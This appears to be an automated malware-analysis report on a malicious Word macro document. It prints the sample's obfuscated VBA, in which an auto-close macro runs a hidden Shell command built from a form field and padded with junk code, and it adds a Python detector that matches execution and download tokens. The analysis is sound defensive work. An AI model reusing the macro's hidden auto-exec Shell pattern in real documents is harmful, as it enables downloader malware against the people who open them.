Verdict: MALICIOUS
Risk score: 250

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Word document containing VBA macros. The auto-execution procedure autoclose(), which Word runs when the document is closed, calls the function A93977(), and that function invokes Interaction.Shell(). The command line passed to Shell() is assembled at runtime by concatenating variables with the contents of an MSForms TextBox1 control embedded in the document, and the window-style argument is written as 35 - 35 (i.e. 0, vbHide), so the launched process is hidden. The surrounding Select Case / Rnd() / Tan() statements reference undefined variables under On Error Resume Next and appear to be junk code inserted to defeat signature matching. The ClamAV signature Doc.Downloader.Generic-6789372-0 classifies the document as a downloader; the actual command, payload and download destination are not recoverable from the extracted VBA source alone, because they live in the form control and in variables that are only populated at run time.
Heuristics (8)

- ClamAV: Doc.Downloader.Generic-6789372-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-6789372-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script: `End Select S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854) Select Case j903`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Close macro [low, OLE_VBA_AUTOCLOSE]: Auto_Close macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoclose() A93977`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag. No matched line is shown for this finding, and the string does not appear in the extracted VBA source preview below.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier present in ordinary Office files, not a host the macro contacts.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: a6bc010fbbfc41d20260c0c0f3ca65b3f48ce99b9b46c08537bf4c2344d4ee23) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3857 bytes |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "b39699628"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub
Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
Select Case l4106
Case 182722759
E100 = J6497
b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979))
E3035 = V989
z0739 = Rnd(c406 * Tan(239407366))
Case 126165365
j6379 = n8710
c801 = v798
End Select
Select Case R9856
Case 274218981
s095 = R231
v0577 = Rnd(R957 - Round(J5881) / 69701613 - Round(l8846))
H5293 = z5454
t9875 = Rnd(F2276 * Tan(17333469))
Case 229287622
G464 = c485
C570 = W9059
End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
Select Case j903
Case 134579612
i396 = k059
N998 = Rnd(c9216 - Round(I1229) / 260039581 - Round(v2683))
Y294 = p480
z9544 = Rnd(w929 * Tan(114411349))
Case 167667808
n520 = d776
T3875 = P3224
End Select
Select Case z698
Case 271356251
f127 = C9037
O364 = Rnd(w5059 - Round(i949) / 295338709 - Round(j4956))
A2447 = d0550
r8847 = Rnd(r446 * Tan(149331870))
Case 85010848
J233 = n7866
O690 = v6308
End Select
Select Case O783
Case 324183500
W231 = m392
z201 = Rnd(G0677 - Round(u8765) / 88034141 - Round(u3311))
P491 = k245
G858 = Rnd(I7373 * Tan(143913007))
Case 179092980
i675 = w0101
o630 = w655
End Select
Select Case w7932
Case 215674546
n6956 = Z3897
T331 = Rnd(z963 - Round(C3177) / 198778011 - Round(K3065))
A471 = B357
b2587 = Rnd(N3171 * Tan(186124069))
Case 225347770
r107 = i8090
o604 = A3475
End Select
End Function
Attribute VB_Name = "W5827652012"
Attribute VB_Name = "s32425311"
Attribute VB_Name = "a2972487186"
Attribute VB_Name = "X0023386565019"
Attribute VB_Name = "E549476790736"
Attribute VB_Name = "S7403528890"
Attribute VB_Name = "i2579042858"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "M375162137"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "P07614713292770"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w92920624"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T4566761767"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
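The OLE_VBA_SHELL and OLE_VBA_AUTOCLOSE heuristics fire on two different lines of the source above, but the point a triager needs is that the auto-exec stub actually reaches the Shell() call: autoclose() calls A93977(), and A93977() contains the Interaction.Shell() invocation whose window-style argument is the obfuscated constant 35 - 35. The script below is an added example, not the analyzer's own code and not part of the sample: it walks from every auto-execution procedure through the procedures it calls, reports each execution token with the call path that reaches it, extracts the arguments of the Shell() call, and folds a constant-arithmetic window-style argument to its VBA constant name. It runs over a trimmed excerpt of the extracted macros.bas; the auto-exec name list, the token list and all helper names are the example's own choices.

```python
import ast
import re

# Trimmed excerpt of the VBA source from the report's macros.bas preview (the
# auto-exec stub, the function it calls, and a few of the junk statements that
# surround the Shell() call). Sample input for the detector below.
SAMPLE_VBA = '''Attribute VB_Name = "b39699628"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub
Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
Select Case l4106
Case 182722759
E100 = J6497
b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979))
End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
Select Case j903
Case 134579612
i396 = k059
End Select
End Function
'''

# Procedure names Word/Excel run automatically; VBA identifiers are case-insensitive.
AUTOEXEC_NAMES = {
    "autoopen", "auto_open", "autoclose", "auto_close", "autoexec", "auto_exec",
    "autoexit", "auto_exit", "autonew", "auto_new", "document_open",
    "document_close", "document_new", "workbook_open", "workbook_close",
}
PROC_RE = re.compile(r"^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)", re.I)
END_PROC_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
# Execution/download tokens (this example's own list, not the analyzer's).
EXEC_RE = re.compile(r"\bShell\b|WScript\.Shell|CreateObject\s*\(|URLDownloadToFile|XMLHTTP|"
                     r"\bExecute\b|\bcmd(?:\.exe)?\b|powershell", re.I)
# Shell() window-style constants from the VBA runtime.
VB_WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                    3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

def parse_procedures(src):
    """Split VBA source into {lowercased procedure name: [(lineno, text), ...]}."""
    procs, current = {}, None
    for lineno, text in enumerate(src.splitlines(), 1):
        m = PROC_RE.match(text)
        if m:
            current = m.group(1).lower()
            procs[current] = []
        elif END_PROC_RE.match(text):
            current = None
        elif current is not None:
            procs[current].append((lineno, text))
    return procs

def callees(body, known):
    """Known procedure names referenced anywhere in a procedure body."""
    return {n for _, t in body for n in known if re.search(r"\b%s\b" % re.escape(n), t, re.I)}

def find_autoexec_exec_paths(src):
    """From each auto-exec procedure, follow calls into other procedures and report
    every line carrying an execution token together with the path that reaches it."""
    procs, hits = parse_procedures(src), []
    for entry in sorted(procs):
        if entry not in AUTOEXEC_NAMES:
            continue
        stack, seen = [(entry, [entry])], set()
        while stack:
            name, path = stack.pop()
            if name in seen:
                continue
            seen.add(name)
            for lineno, text in procs[name]:
                if EXEC_RE.search(text):
                    hits.append({"entry": entry, "path": path, "line": lineno, "text": text.strip()})
            for callee in sorted(callees(procs[name], procs.keys()) - seen):
                stack.append((callee, path + [callee]))
    return hits

def shell_call_args(text):
    """Arguments of the first Shell(...) on a line, split at top-level commas,
    honouring nested parentheses and string literals (VBA doubles quotes inside strings)."""
    m = re.search(r"\bShell\s*\(", text, re.I)
    if not m:
        return None
    depth, in_str, buf, args, i = 1, False, [], [], m.end()
    while i < len(text):
        c = text[i]
        if c == '"':
            in_str = not in_str
        elif not in_str:
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    break
            elif c == "," and depth == 1:
                args.append("".join(buf).strip()); buf = []; i += 1
                continue
        buf.append(c); i += 1
    args.append("".join(buf).strip())
    return args

def shell_window_style(expr):
    """Fold a constant-arithmetic window-style argument such as '35 - 35' to
    (value, VBA constant name); anything non-constant yields (None, 'unknown')."""
    ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b, ast.Mult: lambda a, b: a * b}
    def fold(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](fold(node.left), fold(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -fold(node.operand)
        raise ValueError("not a constant expression")
    try:
        value = fold(ast.parse(expr, mode="eval").body)
    except (ValueError, SyntaxError):
        return None, "unknown"
    return value, VB_WINDOW_STYLES.get(value, "unknown")

def report(src):
    """Human-readable lines for each auto-exec -> execution-token path."""
    out = []
    for h in find_autoexec_exec_paths(src):
        out.append("%s (line %d): %s" % (" -> ".join(h["path"]), h["line"], h["text"][:70]))
        args = shell_call_args(h["text"])
        if args:
            value, name = shell_window_style(args[-1])
            out.append("  window style %r = %s (%s); command built from: %s" % (args[-1], value, name, args[0]))
    return out

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_VBA)))
```

Run stand-alone it prints the single path autoclose -> a93977 with the Shell() line, the window style folded to 0 (vbHide), and the command expression, which makes visible that the command text comes from b39699628.TextBox1 and run-time variables rather than from a string literal a static scanner could read.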